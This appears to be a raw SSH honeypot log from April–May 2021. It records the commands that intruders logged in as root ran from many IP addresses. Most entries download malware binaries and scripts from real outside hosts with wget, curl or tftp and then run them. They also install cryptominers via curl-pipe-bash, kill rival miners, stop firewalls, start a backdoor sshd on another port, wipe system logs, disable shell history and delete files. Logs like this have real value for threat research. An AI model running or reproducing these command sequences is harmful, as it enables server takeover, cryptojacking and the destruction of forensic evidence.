Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec cd /tmp; rm -rf x86_64; wget http://45.14.149.204/x86_64; chmod 777 *; ./x86_64 x86hxed; pkill xmrig; pkill cnrig;
cd /tmp
rm -rf x86_64
wget http://45.14.149.204/x86_64
chmod 777 *
./x86_64 x86hxed
pkill xmrig
pkill cnrig

From 134.228.217.148 7-Apr-2021 08:47:12 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 83.150.16.14 7-Apr-2021 19:44:45 ssh2 root
Exec uname -a ; lscpu
uname -a
lscpu
Exec uname -a ; lscpu
uname -a
lscpu
Exec uname -a ; lscpu
uname -a
lscpu
Exec uname -a ; lscpu
uname -a
lscpu
Exec uname -a ; lscpu
Exec uname -a ; lscpu
uname -a
uname -a
lscpu
lscpu
Exec uname -a ; lscpu
uname -a
lscpu
Exec uname -a ; lscpu
uname -a
lscpu

From 83.150.16.14 7-Apr-2021 19:44:45 ssh2 root
Exec uname -a ; lscpu
uname -a
lscpu
Exec uname -a ; lscpu
uname -a
lscpu
Exec uname -a ; lscpu
uname -a
lscpu
Exec uname -a ; lscpu
uname -a
lscpu

From 103.216.63.149 8-Apr-2021 18:23:41 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://88.218.17.110/bins/Oblivion121.x86; curl -O http://88.218.17.110/bins/Oblivion121.x86;cat Oblivion121.x86 >cp;chmod +x *;./cp x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://88.218.17.110/bins/Oblivion121.x86
curl -O http://88.218.17.110/bins/Oblivion121.x86
cat Oblivion121.x86 >cp
chmod +x *
./cp x86

From 106.14.38.50 9-Apr-2021 01:08:06 ssh2 root
Exec echo -n AuwTbOOz|md5sum
echo -n AuwTbOOz|md5sum

From 61.149.215.166 10-Apr-2021 02:01:21 ssh2 root
Exec echo -n FmssLWZd|md5sum
echo -n FmssLWZd|md5sum

From 45.95.168.192 11-Apr-2021 16:32:40 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.176.41/1a9zxq/meth.x86; cat meth.x86 > meth; chmod +x meth; chmod 777 *; ./meth rooted; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://179.43.176.41/1a9zxq/meth.x86
cat meth.x86 > meth
chmod +x meth
chmod 777 *
./meth rooted
history -c

From 43.225.111.21 11-Apr-2021 23:44:32 ssh2 root
Exec uname -a
uname -a
Exec uname -a
uname -a
Exec uname -a
uname -a

From 142.93.240.92 12-Apr-2021 11:47:19 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://134.122.65.100/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 134.122.65.100 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 134.122.65.100; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://134.122.65.100/yoyobins.sh
chmod 777 yoyobins.sh
sh yoyobins.sh
tftp 134.122.65.100 -c get yoyotftp1.sh
chmod 777 yoyotftp1.sh
sh yoyotftp1.sh
tftp -r yoyotftp2.sh -g 134.122.65.100
chmod 777 yoyotftp2.sh
sh yoyotftp2.sh
rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh
rm -rf *

From 156.234.169.30 12-Apr-2021 12:21:27 ssh2 root
curl -s -L http://14.18.102.61:8666/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 200.85.63.230 12-Apr-2021 23:52:29 ssh2 root
Exec echo -n 9sq5fE8u|md5sum
echo -n 9sq5fE8u|md5sum

From 212.102.49.29 13-Apr-2021 08:40:16 ssh2 root
w
uname -a
history
last
ps -x
cd /home
ls -a
cd .ssh
ls -a
cd .ssh
ls -a
pwd
nproc
arp -a
ip r
cat .bash_history
cd
ls -a
cat .bash_history
top
unset
rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
unset HISTFILE
unset HISTSAVE
unset HISTLOG
history -n
unset WATCH
export HISTFILE=/dev/null
export HISTFILE=/dev/null unset HISTORY
unset HISTFILE
unset HISTFILESIZE
unset HISTSIZE
unset HISTZONE
unset HISTLOG
unset HISTSAVE
history -n
unset WATCH
unset REMOTEHOST
unset REMOTEHOSTFILE unset HISTORY
unset HISTFILE
unset HISTFILESIZE
unset HISTSIZE
unset HISTZONE
unset HISTLOG
unset HISTSAVE
history -n
unset WATCH
unset REMOTEHOST
unset REMOTEHOSTFILE
cd /usr/bin
wget 185.244.149.237/e4.esp
tar xvf e4.esp
rm -rf e4.esp
cd e4
chmod +x *
./run
wget
wget 185.244.149.237/e4.esp
http://185.244.149.237/e4.esp
curl -Ô
curl -ÃO
wget
wget http://185.244.149.237/e4.esp
ls -a
pwd

From 185.233.100.23 13-Apr-2021 10:24:38 ssh2 root
w
ls
pwd
cd /home
ls -a
top
ps -x
ps aux
ifconfig
uname -a

From 185.36.81.98 13-Apr-2021 18:18:14 ssh2 root
Exec cd /tmp; rm - rf x86_64; wget http://107.172.249.148/x86_64; curl -O http://107.172.249.148/x86_64; busybox wget http://107.172.249.148/x86_64; chmod 777 x86_64; ./x86_64 roots; rm -rf *;
cd /tmp
rm - rf x86_64
wget http://107.172.249.148/x86_64
curl -O http://107.172.249.148/x86_64
busybox wget http://107.172.249.148/x86_64
chmod 777 x86_64
./x86_64 roots
rm -rf *

From 194.165.16.27 13-Apr-2021 18:47:19 ssh2 root
w
cd /home
ls -a
exit

From 47.61.246.210 14-Apr-2021 08:00:42 ssh2 root
w
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
w
ps -x
cd /tmp
ls -al
cd /var/tmp
ls -al
wget http://185.244.149.237/r
perl r
yum install perl
apt-get install perl
ls -al
wget http://185.244.149.237/r
perl r
uname -a
nproc
ps -x
kill -9 17509
kill -9 17341
kill -9 22262
kill -9 6781
ps -x
kill -9 17341
ps -x
kill -9 17341
kill -9 17509
kill -9 22296
ps -x
reboot
restart
exit

From 109.104.151.108 14-Apr-2021 14:58:21 ssh2 root
Exec cd /tmp || cd /var/run || cd /sys || cd /bin || cd /mnt || cd /root || cd /; wget http://109.104.151.108/mtro/mbot.x86; chmod +x mbot.x86; ./mbot.x86 Spoofed; rm -rf mbot.x86; history -c
cd /tmp || cd /var/run || cd /sys || cd /bin || cd /mnt || cd /root || cd /
wget http://109.104.151.108/mtro/mbot.x86
chmod +x mbot.x86
./mbot.x86 Spoofed
rm -rf mbot.x86
history -c

From 185.36.81.58 16-Apr-2021 00:49:25 ssh2 root
Exec pkill YDEdr; pkill ip; pkill xmrig; pkill cnrig; pkill kswapd0; pkill x86_64; pkill x86; cd /tmp; rm -rf x86_64; wget http://45.14.149.204/x86_64; curl -O http://45.14.149.204/x86_64; busybox wget http://45.14.149.204/x86_64; chmod 777 x86_64; ./x86_64 x86hxed;
pkill YDEdr
pkill ip
pkill xmrig
pkill cnrig
pkill kswapd0
pkill x86_64
pkill x86
cd /tmp
rm -rf x86_64
wget http://45.14.149.204/x86_64
curl -O http://45.14.149.204/x86_64
busybox wget http://45.14.149.204/x86_64
chmod 777 x86_64
./x86_64 x86hxed

From 185.36.81.58 16-Apr-2021 22:26:54 ssh2 root
Exec pkill YDEdr; pkill ip; pkill xmrig; pkill cnrig; pkill kswapd0; pkill x86_64; pkill x86; cd /tmp; rm -rf x86_64; wget http://45.14.149.204/x86_64; curl -O http://45.14.149.204/x86_64; busybox wget http://45.14.149.204/x86_64; chmod 777 x86_64; ./x86_64 x86hxed; cat /etc/issue
pkill YDEdr
pkill ip
pkill xmrig
pkill cnrig
pkill kswapd0
pkill x86_64
pkill x86
cd /tmp
rm -rf x86_64
wget http://45.14.149.204/x86_64
curl -O http://45.14.149.204/x86_64
busybox wget http://45.14.149.204/x86_64
chmod 777 x86_64
./x86_64 x86hxed
cat /etc/issue

From 109.104.151.112 17-Apr-2021 00:29:31 ssh2 root
Exec cd /tmp || cd /var/run || cd /sys || cd /bin || cd /mnt || cd /root || cd /; wget http://109.104.151.108/mtr.sh;
curl -O http://109.104.151.108/mtr.sh; chmod +x mtr.sh; sh mtr.sh; tftp 109.104.151.108 -c get mtr1.sh; chmod 777 mtr1.sh; sh mtr1.sh; tftp -r mtr2.sh -g 109.104.151.108; chmod 777 mtr2.sh; sh mtr2.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /sys || cd /bin || cd /mnt || cd /root || cd /
wget http://109.104.151.108/mtr.sh
curl -O http://109.104.151.108/mtr.sh
chmod +x mtr.sh
sh mtr.sh
tftp 109.104.151.108 -c get mtr1.sh
chmod 777 mtr1.sh
sh mtr1.sh
tftp -r mtr2.sh -g 109.104.151.108
chmod 777 mtr2.sh
sh mtr2.sh
rm -rf *.sh
history -c

From 150.136.50.97 17-Apr-2021 21:24:37 ssh2 root
Exec echo -n vXSq6IVd|md5sum
echo -n vXSq6IVd|md5sum

From 167.172.108.34 18-Apr-2021 20:56:53 ssh2 root
Exec lscpu ; free -m
lscpu
free -m

From 198.23.200.241 20-Apr-2021 06:04:02 ssh2 root
Exec wget http://185.88.177.50/we.sh; chmod 777 *; sh we.sh
wget http://185.88.177.50/we.sh
chmod 777 *
sh we.sh
Exec wget http://185.88.177.50/we.sh; chmod 777 *; sh we.sh
wget http://185.88.177.50/we.sh
chmod 777 *
sh we.sh
Exec wget http://185.88.177.50/we.sh; chmod 777 *; sh we.sh
wget http://185.88.177.50/we.sh
chmod 777 *
sh we.sh

From 198.23.200.241 20-Apr-2021 06:05:59 ssh2 root
Exec wget http://185.88.177.50/we.sh; chmod 777 *; sh we.sh
wget http://185.88.177.50/we.sh
chmod 777 *
sh we.sh
Exec wget http://185.88.177.50/we.sh; chmod 777 *; sh we.sh
wget http://185.88.177.50/we.sh
chmod 777 *
sh we.sh

From 198.23.200.241 20-Apr-2021 06:06:10 ssh2 root
Exec wget http://185.88.177.50/we.sh; chmod 777 *; sh we.sh
wget http://185.88.177.50/we.sh
chmod 777 *
sh we.sh

From 109.104.151.112 21-Apr-2021 05:58:51 ssh2 root
Exec cd /tmp || cd /var/run || cd /sys || cd /bin || cd /mnt || cd /root || cd /; wget http://109.104.151.10/mtr.sh; busybox http://109.104.151.10/mtr.sh; curl -O http://109.104.151.10/mtr.sh; chmod +x mtr.sh; sh mtr.sh; rm -rf mtr.sh; tftp 109.104.151.10 -c get mtr1.sh; chmod 777 mtr1.sh; sh mtr1.sh; tftp -r mtr2.sh -g 109.104.151.10; chmod +x mtr2.sh; sh mtr2.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /sys || cd /bin || cd /mnt || cd /root || cd /
wget http://109.104.151.10/mtr.sh
busybox http://109.104.151.10/mtr.sh
curl -O http://109.104.151.10/mtr.sh
chmod +x mtr.sh
sh mtr.sh
rm -rf mtr.sh
tftp 109.104.151.10 -c get mtr1.sh
chmod 777 mtr1.sh
sh mtr1.sh
tftp -r mtr2.sh -g 109.104.151.10
chmod +x mtr2.sh
sh mtr2.sh
rm -rf *.sh
history -c

From 185.36.81.58 21-Apr-2021 15:48:30 ssh2 root
Exec pkill YDEdr; pkill ip; pkill xmrig; pkill cnrig; pkill kswapd0; pkill x86_64; pkill x86; cd /tmp; rm -rf config.json; rm -rf kitten; wget http://88.218.17.142/boom.sh; curl -O http://88.218.17.142/boom.sh; busybox wget http://88.218.17.142/boom.sh; chmod 777 *; sh boom.sh;
pkill YDEdr
pkill ip
pkill xmrig
pkill cnrig
pkill kswapd0
pkill x86_64
pkill x86
cd /tmp
rm -rf config.json
rm -rf kitten
wget http://88.218.17.142/boom.sh
curl -O http://88.218.17.142/boom.sh
busybox wget http://88.218.17.142/boom.sh
chmod 777 *
sh boom.sh

From 219.140.169.51 21-Apr-2021 18:31:47 ssh2 root
Exec ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=1987
ln -sf /usr/sbin/sshd /tmp/su
/tmp/su -oPort=1987

From 209.141.60.60 22-Apr-2021 04:42:55 ssh2 root
Exec pkill xmrig; pkill cnrig; pkill ip; pkill java; curl -O http://88.218.17.142/ant.sh; chmod 777 *; ./ant.sh; rm -rf *; echo x
pkill xmrig
pkill cnrig
pkill ip
pkill java
curl -O http://88.218.17.142/ant.sh
chmod 777 *
./ant.sh
rm -rf *
echo x

From 109.104.151.10 22-Apr-2021 11:10:43 ssh2 root
Exec cd /tmp || cd /var/run || cd /sys || cd /bin || cd /mnt || cd /root || cd /; wget http://109.104.151.10/mtr.sh; busybox wget http://109.104.151.10/mtr.sh; curl -O http://109.104.151.10/mtr.sh; chmod +x mtr.sh; sh mtr.sh; rm -rf mtr.sh; tftp 109.104.151.10 -c get mtr1.sh; chmod 777 mtr1.sh; sh mtr1.sh; tftp -r mtr2.sh -g 109.104.151.10; chmod +x mtr2.sh; sh mtr2.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /sys || cd /bin || cd /mnt || cd /root || cd /
wget http://109.104.151.10/mtr.sh
busybox wget http://109.104.151.10/mtr.sh
curl -O http://109.104.151.10/mtr.sh
chmod +x mtr.sh
sh mtr.sh
rm -rf mtr.sh
tftp 109.104.151.10 -c get mtr1.sh
chmod 777 mtr1.sh
sh mtr1.sh
tftp -r mtr2.sh -g 109.104.151.10
chmod +x mtr2.sh
sh mtr2.sh
rm -rf *.sh
history -c

From 164.90.160.7 22-Apr-2021 13:35:29 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://157.230.6.23/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 157.230.6.23 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 157.230.6.23; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://157.230.6.23/yoyobins.sh
chmod 777 yoyobins.sh
sh yoyobins.sh
tftp 157.230.6.23 -c get yoyotftp1.sh
chmod 777 yoyotftp1.sh
sh yoyotftp1.sh
tftp -r yoyotftp2.sh -g 157.230.6.23
chmod 777 yoyotftp2.sh
sh yoyotftp2.sh
rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh
rm -rf *

From 144.76.98.125 22-Apr-2021 21:23:20 ssh2 root
Exec lscpu ; nproc ; wget https://cdn.discordapp.com/attachments/834709504049414155/834732084945092608/hq_dorks_124k_1.txt
lscpu
nproc
wget https://cdn.discordapp.com/attachments/834709504049414155/834732084945092608/hq_dorks_124k_1.txt

From 165.22.89.89 23-Apr-2021 11:56:54 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://104.248.30.69/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 104.248.30.69 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 104.248.30.69; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://104.248.30.69/yoyobins.sh
chmod 777 yoyobins.sh
sh yoyobins.sh
tftp 104.248.30.69 -c get yoyotftp1.sh
chmod 777 yoyotftp1.sh
sh yoyotftp1.sh
tftp -r yoyotftp2.sh -g 104.248.30.69
chmod 777 yoyotftp2.sh
sh yoyotftp2.sh
rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh
rm -rf *
Exec cd /tmp || cd /run || cd /; wget http://104.248.30.69/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 104.248.30.69 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 104.248.30.69; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://104.248.30.69/yoyobins.sh
chmod 777 yoyobins.sh
sh yoyobins.sh
tftp 104.248.30.69 -c get yoyotftp1.sh
chmod 777 yoyotftp1.sh
sh yoyotftp1.sh
tftp -r yoyotftp2.sh -g 104.248.30.69
chmod 777 yoyotftp2.sh
sh yoyotftp2.sh
rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh
rm -rf *

From 165.22.89.89 23-Apr-2021 11:57:43 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://104.248.30.69/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 104.248.30.69 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 104.248.30.69; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://104.248.30.69/yoyobins.sh
chmod 777 yoyobins.sh
sh yoyobins.sh
tftp 104.248.30.69 -c get yoyotftp1.sh
chmod 777 yoyotftp1.sh
sh yoyotftp1.sh
tftp -r yoyotftp2.sh -g 104.248.30.69
chmod 777 yoyotftp2.sh
sh yoyotftp2.sh
rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh
rm -rf *

From 143.110.144.182 23-Apr-2021 14:17:02 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://64.227.103.117/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 64.227.103.117 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 64.227.103.117; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://64.227.103.117/yoyobins.sh
chmod 777 yoyobins.sh
sh yoyobins.sh
tftp 64.227.103.117 -c get yoyotftp1.sh
chmod 777 yoyotftp1.sh
sh yoyotftp1.sh
tftp -r yoyotftp2.sh -g 64.227.103.117
chmod 777 yoyotftp2.sh
sh yoyotftp2.sh
rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh
rm -rf *

From 205.185.122.102 23-Apr-2021 17:36:00 ssh2 root
Exec cd /tmp; wget http://88.218.17.142/boom.sh; busybox wget http://88.218.17.142/boom.sh; curl -O http://88.218.17.142/boom.sh; chmod 777 *; ./boom.sh; rm -rf *; pkill cnrig;
cd /tmp
wget http://88.218.17.142/boom.sh
busybox wget http://88.218.17.142/boom.sh
curl -O http://88.218.17.142/boom.sh
chmod 777 *
./boom.sh
rm -rf *
pkill cnrig

From 123.13.221.241 25-Apr-2021 00:57:11 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c httpµØÖ·;chmod 777 ľÂí;./ľÂí;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c httpµØÖ·
chmod 777 ľÂí
./ľÂí

From 205.185.120.201 25-Apr-2021 05:01:01 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://209.141.40.31/bins/x86; curl -O http://209.141.40.31/bins/x86 chmod 777 *; ./x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://209.141.40.31/bins/x86
curl -O http://209.141.40.31/bins/x86 chmod 777 *
./x86

From 205.185.120.201 26-Apr-2021 01:13:50 ssh2 root
Exec cd /tmp || cd /; wget -q http://209.141.40.31/bins/x86; curl -O http://209.141.40.31/bins/x86; chmod 777 *; ./x86
cd /tmp || cd /
wget -q http://209.141.40.31/bins/x86
curl -O http://209.141.40.31/bins/x86
chmod 777 *
./x86

From 179.43.176.42 26-Apr-2021 03:47:14 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.176.41/1a9zxq/meth.x86; cat meth.x86 > meth; chmod +x meth; chmod 777 *; ./meth rooted; cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.176.41/cometome; cat cometome > meth; chmod +x meth; chmod 777 *; ./meth; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://179.43.176.41/1a9zxq/meth.x86
cat meth.x86 > meth
chmod +x meth
chmod 777 *
./meth rooted
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://179.43.176.41/cometome
cat cometome > meth
chmod +x meth
chmod 777 *
./meth
history -c

From 195.10.212.195 26-Apr-2021 05:17:50 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://157.245.140.252/dirdir000/0s1s12.x86; cat 0s1s12.x86 > z1z2z5a6qw5asda; chmod +x z1z2z5a6qw5asda; ./z1z2z5a6qw5asda Rooted.VPS; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://157.245.140.252/dirdir000/0s1s12.x86
cat 0s1s12.x86 > z1z2z5a6qw5asda
chmod +x z1z2z5a6qw5asda
./z1z2z5a6qw5asda Rooted.VPS
history -c

From 81.104.121.15 26-Apr-2021 09:33:17 ssh2 root
w
uname -a
ls -a
nano test.pl
vi test.pl
cat test.pl
cd /mnt
ls -a
pwd
cd /
ls -a
cd /var/tmp
ls -a
wget denis.do.am/test.tgz

From 185.36.81.58 28-Apr-2021 04:46:53 ssh2 root
Exec pkill YDEdr; pkill ip; pkill xmrig; pkill cnrig; pkill kswapd0; pkill x86_64; pkill x86; cd /tmp; rm -rf config.json; rm -rf kitten; wget http://88.218.17.142/boom.sh; curl -O http://88.218.17.142/boom.sh; busybox wget http://88.218.17.142/boom.sh; chmod 777 *; sh boom.sh; cat /etc/issue;
pkill YDEdr
pkill ip
pkill xmrig
pkill cnrig
pkill kswapd0
pkill x86_64
pkill x86
cd /tmp
rm -rf config.json
rm -rf kitten
wget http://88.218.17.142/boom.sh
curl -O http://88.218.17.142/boom.sh
busybox wget http://88.218.17.142/boom.sh
chmod 777 *
sh boom.sh
cat /etc/issue

From 209.141.49.19 30-Apr-2021 13:34:56 ssh2 root
Exec cat /etc/issue;
cat /etc/issue

From 179.43.176.42 1-May-2021 23:17:00 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.176.41/cometome; cat cometome > meth; chmod +x meth; chmod 777 *; ./meth rooted; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://179.43.176.41/cometome
cat cometome > meth
chmod +x meth
chmod 777 *
./meth rooted
history -c

From 46.101.36.10 2-May-2021 04:47:22 ssh2 root
Exec echo -n 7mHmLJqz|md5sum
echo -n 7mHmLJqz|md5sum

From 86.124.137.149 2-May-2021 11:18:11 ssh2 root
ls
cd
ls
cat te
cat test.pl
wget nasapaul.com/v.yp
wget nasapaul.com/v.py
clear
l
wget
sl
curl nasapaul.com/v.py
ls
cd
ls
cd /home
ls
halt
kill -19 -1
exit

From 206.189.6.18 3-May-2021 11:34:19 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.87.139.100/x86/GhOul.sh; chmod 777 GhOul.sh; sh GhOul.sh; tftp 194.87.139.100 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 194.87.139.100; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.87.139.100 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf GhOul.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://194.87.139.100/x86/GhOul.sh
chmod 777 GhOul.sh
sh GhOul.sh
tftp 194.87.139.100 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 194.87.139.100
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 194.87.139.100 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf GhOul.sh tftp1.sh tftp2.sh ftp1.sh
rm -rf *

From 46.101.210.213 4-May-2021 17:25:27 ssh2 root
Exec cd /tmp  cd /run  cd /; wget http://134.122.67.26/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 134.122.67.26 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 134.122.67.26; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf *
cd /tmp cd /run cd /
wget http://134.122.67.26/yoyobins.sh
chmod 777 yoyobins.sh
sh yoyobins.sh
tftp 134.122.67.26 -c get yoyotftp1.sh
chmod 777 yoyotftp1.sh
sh yoyotftp1.sh
tftp -r yoyotftp2.sh -g 134.122.67.26
chmod 777 yoyotftp2.sh
sh yoyotftp2.sh
rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh
rm -rf *

From 103.247.10.136 5-May-2021 03:27:32 ssh2 root
Exec echo -n PBTHwkWZ|md5sum
echo -n PBTHwkWZ|md5sum

From 5.15.44.118 6-May-2021 11:07:16 ssh2 root
top
w
uname -a
ps x
ls -all
wget iubi.freevar.com/r.tgz
curl
uname -a
ps ax
history
ip
ls
ps ax
wget
curl
yum
apy
apt
apt install
kill -9 -1
exit

From 185.36.81.58 8-May-2021 07:25:18 ssh2 root
Exec pkill kitten; pkill YDEdr; pkill ip; pkill xmrig; pkill cnrig; pkill kswapd0; pkill x86_64; pkill x86; cd /tmp; rm -rf config.json; rm -rf kitten; wget http://88.218.17.142/boom.sh; curl -O http://88.218.17.142/boom.sh; busybox wget http://88.218.17.142/boom.sh; chmod 777 *; sh boom.sh; cat /etc/issue;
pkill kitten
pkill YDEdr
pkill ip
pkill xmrig
pkill cnrig
pkill kswapd0
pkill x86_64
pkill x86
cd /tmp
rm -rf config.json
rm -rf kitten
wget http://88.218.17.142/boom.sh
curl -O http://88.218.17.142/boom.sh
busybox wget http://88.218.17.142/boom.sh
chmod 777 *
sh boom.sh
cat /etc/issue

From 222.240.98.30 10-May-2021 23:52:58 ssh2 root
Exec uname -a; cd /tmp ; curl -s -L http://194.5.250.113/xmr.sh | LC_ALL=en_US.UTF-8 bash -s
uname -a
cd /tmp
curl -s -L http://194.5.250.113/xmr.sh | LC_ALL=en_US.UTF-8 bash -s

From 103.151.124.160 12-May-2021 09:31:37 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; rm -rf installer.sh; wget http://51.75.170.84/installer.sh; chmod 777 installer.sh; sh installer.sh; rm -rf tftp1.sh; tftp 51.75.170.84 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; rm -rf tftp2.sh; tftp -r tftp2.sh -g 51.75.170.84; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm -rf installer.sh
wget http://51.75.170.84/installer.sh
chmod 777 installer.sh
sh installer.sh
rm -rf tftp1.sh
tftp 51.75.170.84 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
rm -rf tftp2.sh
tftp -r tftp2.sh -g 51.75.170.84
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 209.141.53.114 15-May-2021 21:29:04 ssh2 root
Exec apt update -y; apt install curl -y; cat /etc/issue; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s;timeout 10 top
apt update -y

From 209.141.58.203 17-May-2021 07:07:51 ssh2 root
Exec cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget 209.141.58.203/ssh || curl -o ssh 209.141.58.203/ssh; tar xvf ssh; cd .ssh; chmod +x *; ./sshd;./krane root
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget 209.141.58.203/ssh || curl -o ssh 209.141.58.203/ssh
tar xvf ssh
cd .ssh
chmod +x *
./sshd
./krane root

From 209.141.58.203 18-May-2021 09:57:41 ssh2 root
Exec cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm -rf ssh*;rm -rf .ssh*; wget 209.141.58.203/ssh || curl -o ssh 209.141.58.203/ssh; tar xvf ssh; cd .ssh; chmod +x *; ./sshd;./krane root
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm -rf ssh*
rm -rf .ssh*
wget 209.141.58.203/ssh || curl -o ssh 209.141.58.203/ssh
tar xvf ssh
cd .ssh
chmod +x *
./sshd
./krane root

From 183.240.218.202 19-May-2021 02:49:44 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://194.5.250.113/xmr.sh | LC_ALL=en_US.UTF-8 bash -s
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://194.5.250.113/xmr.sh | LC_ALL=en_US.UTF-8 bash -s

From 203.26.81.34 21-May-2021 10:06:41 ssh2 root
